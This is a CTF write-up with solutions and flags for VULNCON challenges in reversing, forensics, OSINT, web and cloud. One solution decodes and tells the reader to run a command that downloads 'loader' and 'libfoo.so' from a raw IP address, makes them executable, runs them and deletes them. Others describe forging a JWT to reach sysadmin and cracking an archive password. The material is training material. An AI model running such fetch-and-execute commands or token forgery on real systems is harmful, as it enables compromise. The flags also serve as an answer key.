Binary/Malware Analyst Track
Traceless Traceback
100
reverse engineering @W1LDQU4K3
A devastating ransomware attack left VULNCON, a prominent cybersecurity organization, reeling from significant losses; urgent measures were required for their incident response capabilities. The organization's budget constraints, however, meant they couldn't afford a critical tool essential for their recovery. Harnessing the skills of their talented team of reverse engineers, VULNCON devised a daring plan.
They turned to you, their trusted specialist in the realm of reversing, with a singular mission:
reverse-engineer the elusive software and find the license key that would unlock their path to
recovery.
While decompiling you can see that the binary XORs each byte with its index (values from 0 to 134), and you get the following output:
wget -q '34.93.47.31/loader'; wget -q '34.93.47.31/libfoo.so'; chmod +x loader; chmod +x libfoo.so; ./loader; rm loader; rm libfoo.so;
After executing those commands decompile the libfoo.so
long long foo()
{
    char v0; // [bp-0x38]
    printf("Enter the license Key: ");
    fgets(&v0, 35, *((long long *)&stdin));
    ::0x401080::logic(&v0);
    return ::0x401070::flag_check();
}
It calls the logic function; the following script undoes what that function does:
def cc(a):
    # a is one 16-bit value written in binary: the high byte is the first
    # character, the low byte is the second one
    a = int(a, 2)
    b = a >> 8           # first character
    c = a - (b << 8)     # second character (what remains after removing b)
    return [b, c]

# Output of the logic function, one binary word per character pair
v0 = ("11001001100010 11010001100100 110010100110000 11000100110000 11001100110101 "
      "110000100110101 110011001100100 11011001100101 110011000111000 11100100110111 "
      "110001100110111 11001101100100 110000100110000 11011100110001 110010000110010 "
      "110011000110100")

l = []
for i in v0.split(" "):
    l += cc(i)
for i in l:
    print(chr(i), end="")
print(len(l))
The above operations are what the logic function does. We have the output and we know the operation was a left shift, so to reverse it: shift right to get the first value, then shift that first value left again and subtract it from the output to get the second value.
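As an added example that is not part of the original writeup, the following Python re-implements both transforms this challenge uses (the index XOR from the first step and the pair-packing done by logic()) together with their inverses, and checks them against the binary string above; the function names are my own.

```python
# Added example (not from the original writeup): the two transforms seen in
# the Traceless Traceback binary, each with its inverse.
#  1. XOR of every byte with its own index (0, 1, 2, ...), which hides the
#     loader command string; XOR is its own inverse.
#  2. the logic() packing: two ASCII chars -> (c1 << 8) | c2, printed in
#     binary, which is what the cc() script above undoes.

def xor_with_index(data: bytes) -> bytes:
    """XOR byte i with i (mod 256); the same call obfuscates and recovers."""
    return bytes(b ^ (i & 0xFF) for i, b in enumerate(data))

def pack_pairs(text: str) -> str:
    """Forward direction of logic(): fold consecutive char pairs into one
    16-bit value and write it in binary without zero padding, as dumped."""
    assert len(text) % 2 == 0, "logic() consumes the input two chars at a time"
    words = []
    for i in range(0, len(text), 2):
        hi, lo = ord(text[i]), ord(text[i + 1])
        words.append(format((hi << 8) | lo, "b"))
    return " ".join(words)

def unpack_pairs(binary_words: str) -> str:
    """Inverse: shift right to get the first char, shift it back left and
    subtract to get the second (the same arithmetic as cc() above)."""
    out = []
    for word in binary_words.split():
        a = int(word, 2)
        b = a >> 8          # first character
        c = a - (b << 8)    # second character (equivalently a & 0xFF)
        out.append(chr(b) + chr(c))
    return "".join(out)

# The 16 binary words the challenge's logic() function produces.
V0 = ("11001001100010 11010001100100 110010100110000 11000100110000 "
      "11001100110101 110000100110101 110011001100100 11011001100101 "
      "110011000111000 11100100110111 110001100110111 11001101100100 "
      "110000100110000 11011100110001 110010000110010 110011000110100")

def recover_key() -> str:
    return unpack_pairs(V0)

if __name__ == "__main__":
    key = recover_key()
    print(key, len(key))
    assert pack_pairs(key) == V0            # round trip: exact inverses
    # Constructed sample for the index XOR (not the real loader string).
    hidden = xor_with_index(b"constructed sample")
    assert xor_with_index(hidden) == b"constructed sample"
```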
Flag :- vulncon{2b4de01035a5fd6ef897c73da071d2f432}
Unravel the ransom
50
reverse engineering @W1LDQU4K3
There was a devastating ransomware attack on VULNCON, a renowned cybersecurity organization, and a critical file containing vital information has been encrypted beyond reach. As part
of the response team, you, a skilled reverse engineering specialist, have been entrusted with the
task of unraveling this puzzle. The organization has procured a decryptor tool that promises to
unlock the encrypted file, but there's a significant hurdle: no one knows the password needed to
initiate the decryption process.
With time ticking and stakes high, your mission is clear—to unearth the elusive password and
restore access to the invaluable data.
NOTE: flag format - vulncon{md5_hash_of_found_value}
decryptor.zip
secret.txt.ENC
Open the exe in dotPeek and you can see a base64 password string, which is 232<?>9?
The password “232<?>9?” is XOR-encrypted four times with a number.
Note that the number changes on each pass; initially it is 8.
Since we are reversing, apply those values in reverse order to decrypt the password.
So the decrypted password is 98974524
Now load secret.txt.ENC into the decryptor.
After decrypting, check the secret.txt file.
Your Flag is vulncon{6599edfaacb379cde21d31edde92421c}
Binary Breakout
20
reverse engineering @W1LDQU4K3
In the realm of cybersecurity challenges, the renowned organization VULNCON is currently
hosting an engaging Capture The Flag (CTF). As part of their preparations, the developers are
diligently crafting a state-of-the-art dashboard to facilitate the CTF experience. However, during
the testing phase, an intriguing test challenge was introduced to the dashboard, only to encounter
unexpected errors.
As a developer in VULNCON, your task is to fix the error and solve the test challenge to verify
the working of the dashboard.
Note: flag format vulncon{md5_hash_of_found_value}
ctfdashboard
for (; *((int *)&v0); v0 = (unsigned int)(*((int *)&v0) * 1717986919 >> 34) - (*((int *)&v0) >> 31))
{
    v4 += 1;
    v7 = *((int *)&v0);
    v2 = (v7 * 1717986919 >> 34) - (v7 >> 31);
    v2 = (unsigned int)v7 - 5 * v2 * 2;
    v3 = v2 + 5 * v3 * 2;
}
if (v3 != 138087949)
{
    (unsigned int)v6 = printf("Incorrect flag");
    return v6;
}
(unsigned int)v6 = printf("Whatever you submitted just now is your welcome bonus but donot forgot to convert it to flag correct format.");
return v6;
It is just a reverse function: the loop reverses the decimal digits of the input and compares the result with 138087949.
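As an added example, not code from the original writeup, this Python models the decompiled loop (the 1717986919 multiply-and-shift is the compiler's idiom for dividing a 32-bit int by 10) and inverts it to find the input that passes the 138087949 check; names such as check_loop and solve are mine.

```python
# Added example (not from the original writeup): a Python model of the
# decompiled check in the Binary Breakout binary, plus its inverse.

MAGIC = 1717986919   # 0x66666667, the compiler's multiply-and-shift idiom for /10
TARGET = 138087949   # the constant v3 is compared against

def div10(x: int) -> int:
    """Signed 32-bit x / 10 truncating toward zero, computed exactly as the
    decompiled code does: (x * 0x66666667) >> 34, minus the sign bit x >> 31.
    That is what '(v7 * 1717986919 >> 34) - (v7 >> 31)' means."""
    assert -2**31 <= x < 2**31, "the binary works on a 32-bit int"
    return ((x * MAGIC) >> 34) - (x >> 31)

def check_loop(v0: int) -> tuple:
    """Emulate the for-loop for a non-negative input. Returns (v3, v4):
    v2 = v7 - 10*(v7/10) is v7 % 10, and v3 = v2 + 10*v3 appends that digit,
    so v3 ends up as v0 with its decimal digits reversed, v4 as the digit count."""
    v3 = v4 = 0
    while v0:
        v4 += 1
        v7 = v0
        v2 = div10(v7)
        v2 = v7 - 5 * v2 * 2      # last decimal digit of v7
        v3 = v2 + 5 * v3 * 2      # shift v3 one digit left, append it
        v0 = div10(v7)            # the for-loop's update expression
    return v3, v4

def accepted(v0: int) -> bool:
    """True when the binary prints the welcome message instead of 'Incorrect flag'."""
    return check_loop(v0)[0] == TARGET

def solve(target: int = TARGET) -> int:
    """Invert the reversal by reversing the target's decimal digits. An input
    with extra trailing zeros would also pass (they vanish in the reversal),
    but solve()*10 already exceeds a 32-bit int, so this solution is unique."""
    return int(str(target)[::-1])

if __name__ == "__main__":
    found = solve()
    print(found, accepted(found))
```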
Vulncon{f60756619e82d9957502304b1d85b362}
Forensics Investigator Track
Tagged
20
forensics @warl0ck_wraith
Do you like images?? I feel like behind every image there's a story hidden.
PS: Change Flag format to vulncon{} while submitting
logo.png
Use zsteg
Cipher :-
3842494d04040000000000171c0250001276756c6e636f6e7b763372795f336173797d00
Flag :- vulncon{v3ry_3asy}
Noobie Track
Hackkarrmon!
30
noobie :)
Are you a noobie in cyber security? Start from here!
P.S. do you know usually I hate tagging along with hidden motives... but this time maybe I need to!
There is a hint in the question ("tagging along with hidden"), so check the hidden tag:
This flag is safe with me!
vulncon{4hh_w3ll_17_w45n'7_7h47_d1ff1cul7_0r_w45_17?}
SOC Analyst Track
Analysis
30
forensics @warl0ck_wraith
Can you traverse through the logs and find who infiltrated my system? He must have left some trail behind since he was a Joker fan
PS: Change Flag format to vulncon{} while submitting
logs.zip
Unzip logs.zip, select all the 7z archives and extract them.
Then just run grep -r "vulncon{" in the logs directory.
Flag :- vulncon{analysis_done_right}
Network Security Engineer Track
C07P0Nx
50
network @ransc0rp1on
In this challenge, participants delve into intercepted VOIP traffic to uncover a hidden coupon for
conference attendees. Decrypting the coupon from the encrypted voice packets tests their
prowess in VOIP analysis.
chall.pcapng
While going through the SIP packets you will find TinyURL links that point to PNG files.
Check all four packets to get the flag.
Threat Intelligence Analyst Track
Investigation 1
20
OSINT RCP
Dive into the cyber battleground of 2014! Sony Entertainment Pictures has been hacked!
Get ready to use your threat intel skills to find out the perpetrators and the date of the attack.
Good luck, detectives! 🔎😉
*edit - abbreviation may be enough :)
Flag format - vulncon{DD/MM/YY_group name}
Search for "Sony Entertainment Pictures has been hacked!" and open the Wikipedia page.
Flag :- vulncon{24/11/14_GOP}
Investigation 2
30
OSINT RCP
Hey there, OSINT warriors!
Congratulations on making it this far. Now it's time to put your skills to the test. Your next
challenge is to uncover the type of malware used in this cyber attack. But that's not all! You'll
also need to identify the movie that played a pivotal role in inspiring this hack.
Dig deep, connect the dots, and may your investigative instincts guide you to victory. Good luck,
and happy hunting!
● edit: replace the space with _
Flag Format - vulncon{malware type_movie name}
On the same page, search for the malware type.
On the same page, search for the movie.
Flag :- vulncon{wiper_the interview}
Reverse Image Search
30
OSINT RCP
Attention, hackers!
Use your reverse image search skills to pinpoint the city and country where this ship is currently
docked. But that's not all—track down the name of the talented photographer who captured this
image.
Sharpen your eyes, follow the clues, and uncover the details.
Flag Format - vulncon{city_country_photographer_name}
View Hint
Ship.PNG
Just reverse-search Ship.PNG in Google Images.
You will find a boat named Dancing Queen on the MarineTraffic website; view its photos.
Flag :- vulncon{stockholm_sweden_hartmut_knape}
Investigation 3
50
OSINT RCP
Hello again, digital detectives! 😉
The attackers have leaked a trove of data under the title "Gift of GOP" on the internet, and it was
initially uploaded to The Pirate Bay. The Pirate Bay link was pasted somewhere, but it's no
longer active. Can you time travel back to when the link was live to uncover the password for the
file?
Tap into your investigative prowess, sift through the digital trails, and crack this code. The past
holds the key—can you find it?
The clock is ticking—good luck, and happy hunting!
Please note: no need to browse or go through any .onion sites, and no need to download any data. All the information is clearly mentioned in the description.
Flag format - vulncon{password}
https://pirate-proxy.ong/
On this website, search for "gift of gop" and you will get this:
Flag :- vulncon{diespe123}
Security Engineer Track
Internal Leaks
100
web @bravo68dev
0xAl3x has leaked Vulncon's Internals Docs on Dark Web. Can you find out what they are hiding
from everyone behind the scenes?
http://7ebo2vvc4cmwmzvukmjtwqdfdnb7njagz6ipirbbpyfvhspqpiah2lqd.onion/index.html
Open the above onion link in the Tor Browser; from there you will get a file vulnc0n.enc, which file identifies as
vulnc0n.enc: PGP message Symmetrically Encrypted Data
After decrypting it you will get https://files.catbox.moe/wecix6.zip
Now you have the source code; go through all the files inside pfshare.
After going through the source code you will understand how the application works:
Users 1 to 100 have the role user.
Users 101 and 102 are developers and 103 is sysadmin.
There are a public and a private key in the 0xal3x repo.
The message is in the api repo.
If you decrypt it you will get the token.
Logging in as developer with this token, you will get a JWT.
If you decrypt this message you will get the private RSA key, and from that get the public RSA key.
Then apply it to the token and change id to 103 and role to sysadmin.
Now use this token on the uploads directory and you will get the flag.
Flag :- vulncon{4p1_p3nt35t1ng_15_c00l_h4ck}
Cloud Security Engineer Track
Baby Breach
50
cloud @gr33nm0nk
VULNCON hired new interns for hosting their website on AWS. An intern has accidentally pushed a sensitive snapshot to AWS.
Can you recover the flag that is pushed to the Hyderabad region under the name vulncon?
Asia Pacific (Hyderabad) ap-south-2
Configure the AWS CLI for ap-south-2.
Now (with ChatGPT's help for the commands) search for the snapshot named vulncon.
Create a volume from it and attach it to an instance.
Now open the EC2 instance and mount the volume.
Flag :- vulncon{s0_y0u_kn0w_4b0u7_cl0ud_b4ckup5_b2dd04}
Cloud 2
100
cloud @gr33nm0nk
VULNCON has hired another infrastructure specialist to maintain their resources, but he has made a mistake that could get us into trouble. Can you use this url to find the path to the secret before the adversary does?
Check which files are inside the vulncon S3 bucket.
There you can see cloud-2.7z; it is password protected. Crack it with john and you will get the password vulnerablewoman.
After extracting the file you will get all the creds for the MySQL database.
Flag :- vulncon{y0u_br0k3_in_1337_h4ck3r_dea972f6dba}